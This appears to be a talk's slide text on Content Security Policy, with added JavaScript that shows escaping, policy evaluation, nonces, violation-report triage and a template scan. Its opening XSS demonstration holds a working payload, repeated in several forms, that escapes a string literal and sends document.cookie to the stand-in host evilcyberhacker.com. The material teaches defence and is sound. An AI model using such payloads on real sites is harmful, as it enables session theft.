@nathandench
Blog: https://ndench.github.io/security/csp-can-see-purpose
Hyra iQ
We automate high volume contract negotiation for retail and commercial landlords and their law firms
<html>
...
<script>
// ...
// The search term is interpolated straight into a JS string literal inside an inline script
$('#searchTerm').val('Nissan');
</script>
...
</html>
Search for:
Nissan
..
<script>
// ...
// The attacker's closing quote ends the literal; everything after it runs as script in the victim's session
$('#searchTerm').val('');location.href='http://evilcyberhacker.com?cookies='+encodeURIComponent(document.cookie);//');
</script>
..
Search for:
');location.href='http://evilcyberhacker.com?cookies='%2BencodeURIComponent(document.cookie);//'
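The fix for the injection above, as an added example that is not code from the talk: the vulnerable render from the slides next to a hardened one. The hardened page has no inline script at all, so it keeps working once script-src 'self' is enforced, and the search term is HTML-escaped into a data attribute instead of being spliced into a JS string literal. The attribute name data-term, the file name /search.js and the payload string are assumptions made for the example.

```javascript
// Added example (not from the talk): vulnerable render vs. hardened render.
// Assumptions: attribute name data-term, external file /search.js.

function escapeHtml(s) {
  // Escape the characters that can end an attribute value or open a tag.
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// What the slides show: the raw term lands inside a JS string in an inline script.
function renderVulnerable(term) {
  return `<input id="searchTerm">\n` +
         `<script>$('#searchTerm').val('${term}');</script>`;
}

// Hardened: the term goes into an escaped attribute; an external script reads it back.
function renderHardened(term) {
  return `<input id="searchTerm" data-term="${escapeHtml(term)}">\n` +
         `<script src="/search.js"></script>`;
}

// Body of /search.js. As an external file it passes script-src 'self'; the
// browser decodes the entities before exposing dataset.term, so the payload
// is nothing more than text in the input box.
const SEARCH_JS = `
document.addEventListener('DOMContentLoaded', function () {
  var input = document.getElementById('searchTerm');
  input.value = input.dataset.term || '';
});`;

// Constructed payload: the one from the slide, after URL decoding.
const PAYLOAD =
  "');location.href='http://evilcyberhacker.com?cookies='+encodeURIComponent(document.cookie);//'";

// Does the rendered page contain an inline <script> carrying the attacker's code?
function inlineScriptCarriesPayload(html) {
  return /<script>[\s\S]*location\.href[\s\S]*<\/script>/.test(html);
}
```

Escaping alone closes the injection; the CSP is what makes the same mistake elsewhere in the app fail closed, because the attacker's code can only ever arrive as inline script, which script-src 'self' refuses to run.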
Directives:
Values:
Content-Security-Policy:
default-src 'none';
script-src 'self';
style-src 'self' fonts.googleapis.com;
img-src instagram.com;
report-uri https://example.report-uri.com/r/d/csp/enforce
Example CSP. Directives are separated by semicolons; each one is the directive name followed by a space-separated source list, with no colon after the name. The image directive is img-src (there is no image-src), and any fetch directive that is missing falls back to default-src, so here connect-src and font-src are both 'none'.
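To see what the example policy actually allows, here is an added evaluator (not code from the talk or from any CSP library): parseCsp() splits the header value into directives, and allows() applies the default-src fallback and matches 'self' and host sources the way a browser would. Ports, paths, nonces and hashes are out of scope; the page origin https://app.example.com and the URLs in the usage are assumptions.

```javascript
// Added example (not from the talk): evaluate the slide's policy.
// Out of scope: ports, paths, nonces, hashes, redirects.

const EXAMPLE_CSP =
  "default-src 'none'; script-src 'self'; style-src 'self' fonts.googleapis.com; " +
  "img-src instagram.com; report-uri https://example.report-uri.com/r/d/csp/enforce";

// "name src src; name src" -> Map(name -> [src, ...]).
// Per the spec the first occurrence of a directive wins; duplicates are ignored.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Fetch directives fall back to default-src when absent; report-uri and friends do not.
const FETCH_DIRECTIVES = new Set([
  'script-src', 'style-src', 'img-src', 'font-src', 'connect-src', 'media-src',
  'object-src', 'frame-src', 'child-src', 'worker-src', 'manifest-src',
]);

function sourceListFor(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (FETCH_DIRECTIVES.has(directive) && policy.has('default-src')) return policy.get('default-src');
  return null; // no applicable directive: unrestricted
}

// Host-source matching: "example.com", "*.example.com", "https://example.com", "https:".
function hostSourceMatches(source, url) {
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return url.protocol === source; // scheme-source
  let host = source;
  const withScheme = /^([a-z][a-z0-9+.-]*):\/\/(.+)$/.exec(source);
  if (withScheme) {
    if (url.protocol !== withScheme[1] + ':') return false;
    host = withScheme[2];
  }
  host = host.split('/')[0].split(':')[0]; // drop path and port (not modelled here)
  if (host === '*') return true;
  if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
  return url.hostname === host;
}

// Would a browser enforcing headerValue on a page at pageOrigin load urlString for directive?
function allows(headerValue, directive, urlString, pageOrigin) {
  const sources = sourceListFor(parseCsp(headerValue), directive);
  if (sources === null) return true;
  if (sources.length === 1 && sources[0].toLowerCase() === "'none'") return false;
  const url = new URL(urlString, pageOrigin);
  const self = new URL(pageOrigin).origin;
  return sources.some((src) => {
    const s = src.toLowerCase();
    if (s === "'self'") return url.origin === self;
    if (s.startsWith("'")) return false; // 'unsafe-inline', 'nonce-…', 'sha256-…' never match a URL
    return hostSourceMatches(s, url);
  });
}
```

Two results worth noticing with the slide's policy: a stylesheet from fonts.googleapis.com is allowed, but the font files that stylesheet pulls from fonts.gstatic.com fall through to default-src 'none' and are blocked, and so is every fetch/XHR your own scripts make, because connect-src is not set either. A host source without a wildcard matches that host only, so instagram.com does not cover www.instagram.com.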
Content-Security-Policy-Report-Only (same syntax as Content-Security-Policy; violations are sent to report-uri but nothing is blocked)
X-Content-Security-Policy (legacy, non-standard header name from early implementations; current browsers honour only Content-Security-Policy)
add_header Content-Security-Policy-Report-Only "default-src 'none'; ...";
Nginx config (the quoted value is the raw policy, so no colon after the directive name; add_header needs its own terminating semicolon)
<?php
// Vanilla PHP: header() takes the whole "Name: value" line
header("Content-Security-Policy-Report-Only: default-src 'none'; ...");
// Symfony Response: header name and value are separate arguments
$response->headers->set('Content-Security-Policy-Report-Only', "default-src 'none'; ...");
Application code - manually
---
nelmio_security:
    csp:
        report:
            block-all-mixed-content: true
            default-src: ['none']
3rd party library
---
nelmio_security:
    csp:
        report:
            block-all-mixed-content: true
            default-src: ['none']
            script-src:
                - 'self'
                ...
            style-src:
                - 'self'
                ...
            font-src:
                - 'self'
                ...
            img-src:
                - 'self'
                ...
            connect-src:
                - 'self'
                ...
<script nonce="{{ csp_nonce('script') }}">
...
</script>
Content-Security-Policy: script-src 'nonce-67eab753ab3f0a713e02b07421dae6b7' ...
The nonce is generated fresh for every response and must appear both in the header and on each inline <script> that is allowed to run.
// webpack.config.js: devtool is a top-level option, not a plugin. 'eval' wraps
// every module in eval(), which script-src blocks unless 'unsafe-eval' is listed.
module.exports = {
  ...
  devtool: 'eval',
  ...
};
---
# Only in development
nelmio_security:
    csp:
        report:
            script-src:
                - 'unsafe-eval'
---
nelmio_security:
    csp:
        report:
            report-uri: https://example.report-uri.com/r/d/csp/reportOnly
            block-all-mixed-content: true
            default-src: ['none']
            script-src:
                - 'self'
                ...
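What to do with the reports that arrive at report-uri while the policy is in Report-Only mode, as an added example (not code from the talk or from report-uri.com): the reports below are constructed in the "csp-report" JSON shape that browsers POST, and summarise() groups them by directive and blocked URI so the real gaps in the policy stand out from browser-extension noise. The document URIs and blocked URIs are invented for the example.

```javascript
// Added example (not from the talk): triage of report-only CSP violation reports.

// Constructed reports in the shape browsers POST (Content-Type: application/csp-report).
const SAMPLE_REPORTS = [
  { 'csp-report': { 'document-uri': 'https://app.example.com/search', 'violated-directive': "script-src 'self'",
                    'effective-directive': 'script-src', 'blocked-uri': 'inline',
                    'original-policy': "default-src 'none'; script-src 'self'" } },
  { 'csp-report': { 'document-uri': 'https://app.example.com/search', 'violated-directive': "script-src 'self'",
                    'effective-directive': 'script-src', 'blocked-uri': 'inline' } },
  { 'csp-report': { 'document-uri': 'https://app.example.com/', 'violated-directive': "font-src 'none'",
                    'effective-directive': 'font-src', 'blocked-uri': 'https://fonts.gstatic.com/s/roboto/v30/x.woff2' } },
  { 'csp-report': { 'document-uri': 'https://app.example.com/', 'violated-directive': "script-src 'self'",
                    'effective-directive': 'script-src', 'blocked-uri': 'chrome-extension' } },
  { 'csp-report': { 'document-uri': 'https://app.example.com/', 'violated-directive': 'img-src instagram.com',
                    'effective-directive': 'img-src', 'blocked-uri': 'https://evilcyberhacker.com/pixel.gif' } },
].map((r) => JSON.stringify(r));

// Blocked URIs that come from software on the client (extensions) rather than from your pages.
const NOISE = /^(chrome-extension|moz-extension|safari-extension|safari-web-extension|ms-browser-extension)\b/;

function parseReport(body) {
  const r = JSON.parse(body)['csp-report'];
  if (!r || typeof r['violated-directive'] !== 'string') throw new Error('not a CSP report');
  // Older browsers put the whole directive ("script-src 'self'") in violated-directive; keep the name only.
  const directive = (r['effective-directive'] || r['violated-directive']).split(/\s+/)[0];
  return { directive, blocked: r['blocked-uri'] || '', document: r['document-uri'] || '' };
}

// Returns [{ directive, blocked, count }] sorted by count, extension noise removed.
function summarise(bodies) {
  const counts = new Map();
  for (const body of bodies) {
    const { directive, blocked } = parseReport(body);
    if (NOISE.test(blocked)) continue;
    const key = `${directive}\t${blocked}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  return [...counts]
    .map(([key, count]) => {
      const [directive, blocked] = key.split('\t');
      return { directive, blocked, count };
    })
    .sort((a, b) => b.count - a.count || a.directive.localeCompare(b.directive));
}
```

A blocked-uri of "inline" is an inline script, inline style, inline event handler or javascript: URL in your own markup, which is fixed by moving the code out or using a nonce, not by widening the policy; a real host such as fonts.gstatic.com is a missing source to add before switching to enforce; an extension scheme is noise to drop before it skews the counts.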
...
// webpack.config.js
module.exports = (env, argv) => {
  const production = argv.mode === 'production';
  ...
  return {
    ...
    // eval-based source maps only in development; production builds must not need 'unsafe-eval'
    devtool: production ? false : 'eval',
    ...
  };
};
...
<!-- Pretend to be a button with inline script: a javascript: URL counts as inline script and is blocked by script-src without 'unsafe-inline' -->
<a href="javascript:void(0)" class="btn btn-default">...</a>
<!-- Pretend to be a button without `href`: tabindex keeps it focusable; the click handler lives in an external script -->
<a tabindex="0" class="btn btn-default">...</a>
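Finding every instance of the javascript: link before enforcing, as an added example (not code from the talk): a scan over raw template text for the two constructs that an enforced script-src without 'unsafe-inline' will break, javascript: URLs in href/src/action attributes and inline on*="" handlers, plus the external-script replacement for the button. The template text is constructed; the regexes work on text rather than a parsed DOM, so treat hits as leads to review.

```javascript
// Added example (not from the talk): template scan for inline-script constructs.

const JS_URL = /\b(?:href|src|action|formaction)\s*=\s*["']\s*javascript:[^"']*["']/gi;
const INLINE_HANDLER = /\son[a-z]+\s*=\s*["'][^"']*["']/gi;

// Returns [{ line, kind, match }] for every javascript: URL and inline handler in the text.
function findCspBlockers(templateText) {
  const findings = [];
  templateText.split('\n').forEach((line, index) => {
    for (const m of line.matchAll(JS_URL)) findings.push({ line: index + 1, kind: 'javascript-url', match: m[0] });
    for (const m of line.matchAll(INLINE_HANDLER)) findings.push({ line: index + 1, kind: 'inline-handler', match: m[0].trim() });
  });
  return findings;
}

// Constructed template: one javascript: link, its CSP-friendly replacement, one inline handler, one harmless link.
const SAMPLE_TEMPLATE = `<div class="toolbar">
  <a href="javascript:void(0)" class="btn btn-default">Search</a>
  <a tabindex="0" role="button" class="btn btn-default js-search">Search</a>
  <button onclick="doSearch()">Go</button>
  <a href="https://example.com/onboarding">Onboarding</a>
</div>`;

// The replacement: wire the click, and the keyboard activation a real <button>
// would give for free, from an external script (served under script-src 'self').
// Kept as a string so this file runs outside a browser; doSearch is assumed to exist.
const EXTERNAL_HANDLER_JS = `
document.querySelectorAll('.js-search').forEach(function (el) {
  el.addEventListener('click', doSearch);
  el.addEventListener('keydown', function (ev) {
    if (ev.key === 'Enter' || ev.key === ' ') { ev.preventDefault(); doSearch(); }
  });
});`;
```

Run findCspBlockers() over each template file and fix every hit before the policy moves from report-only to enforce; the report-only violation reports will show the same items as blocked-uri "inline", but the scan finds them before any user does.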
---
nelmio_security:
csp:
- report:
- report-uri: https://example.report-uri.com/r/d/csp/reportOnly
block-all-mixed-content: true
+ enforce:
+ report-uri: https://example.report-uri.com/r/d/csp/enforce
block-all-mixed-content: true
default-src: ['none']
script-src:
- 'self'
...
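Review bot: switching the key from report: to enforce: in this hunk turns the policy from report-only into blocking in a single step, and the report-uri moves from .../reportOnly to .../enforce at the same time, so after this change nothing is reported that is not also blocked; the -/+ lines have also lost the indentation the rest of the block carries, and default-src, script-src and the elided lines are shown as unchanged context, so the hunk does not show whether they now sit under enforce:. Suggest showing the whole re-indented block, and keeping a report: section next to enforce: (NelmioSecurityBundle accepts both at once) so the next tightening of the policy can be trialled in report-only mode while the current one is enforced.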
Content-Security-Policy
We're hiring fullstack web devs!
nathan@hyraiq.com